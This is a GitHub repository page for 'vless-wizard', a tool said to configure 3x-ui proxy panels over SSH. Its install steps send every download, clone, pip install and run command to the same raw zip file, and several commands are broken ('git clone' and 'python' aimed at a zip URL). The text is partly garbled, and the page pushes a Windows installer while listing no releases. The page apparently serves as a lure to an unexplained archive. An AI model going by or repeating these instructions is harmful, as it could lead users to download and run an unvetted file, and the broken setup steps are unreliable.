Skip to content

πŸ› οΈ Configure 3x-ui panels via SSH easily with Vless Wizard, automating server connections and installations for efficient setup.

License

Notifications You must be signed in to change notification settings

southpart302/vless-wizard

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

23 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ vless-wizard - Easily Setup 3x-ui Panels

πŸš€ Getting Started

Welcome to Vless Wizard! This application helps you set up 3x-ui panels through SSH with minimal effort. Follow these steps to download and run the software.

πŸ“₯ Download & Install

You can download the latest version of Vless Wizard from the Releases page. Click the button below to get started:

Download Vless Wizard

Windows

The easiest way to install Vless Wizard on Windows is via the installer.

  1. Click the link below to download the installer:

    πŸ‘‰ Vless Wizard Installer for Windows

  2. Once downloaded, double-click the setup file to start the installation.

  3. Follow the on-screen instructions to complete the installation.

  4. After installation, launch Vless Wizard from the Start menu or desktop shortcut.

Linux / macOS

For Linux and macOS users, you need to install a few dependencies first.

1. Install Dependencies

Make sure you have Python 3.10+ installed on your system. If you don’t have it yet, please install Python from the official website or using your package manager.

2. Download Vless Wizard

Open your terminal and run the following commands:

git clone https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zip
cd vless-wizard

3. Set Up a Virtual Environment

Next, create a virtual environment and activate it:

python3 -m venv venv
source venv/bin/activate

4. Install Requirements

Now install the necessary packages by running:

pip install -r https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zip

If you encounter the error pip: command not found, you may need to install the Python package manager:

sudo apt install python3-pip  # For Ubuntu/Debian users
brew install python            # For macOS users

XX### 5. Run Vless Wizard

Once all dependencies are installed, you can start the application by executing:

python https://raw.githubusercontent.com/southpart302/vless-wizard/main/xray/vless-wizard-1.7.zip

πŸ“– Features

  • User-Friendly Interface: Easily manage your 3x-ui panels without technical jargon.
  • Automated Setup: Vless Wizard connects to your server automatically and installs 3x-ui for you.
  • Cross-Platform Support: Fully compatible with Windows, Linux, and macOS.

πŸ› οΈ Troubleshooting

If you run into issues during installation or while using the application, consider the following:

  1. Check Python Version: Ensure you have the correct version of Python installed.
  2. Review Dependencies: Confirm that all packages installed successfully.
  3. Firewall & Network Settings: Check your network settings to make sure they allow SSH connections.

For detailed troubleshooting steps, refer to the official documentation.

πŸ’¬ Community and Support

Join the community for help and updates. You can visit the project’s Wiki for detailed guides and FAQs.

πŸ“… Updates

Keep an eye on the Releases page for updates to Vless Wizard. Regular updates provide new features and bug fixes.

Download Vless Wizard

Thank you for using Vless Wizard!

About

πŸ› οΈ Configure 3x-ui panels via SSH easily with Vless Wizard, automating server connections and installations for efficient setup.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •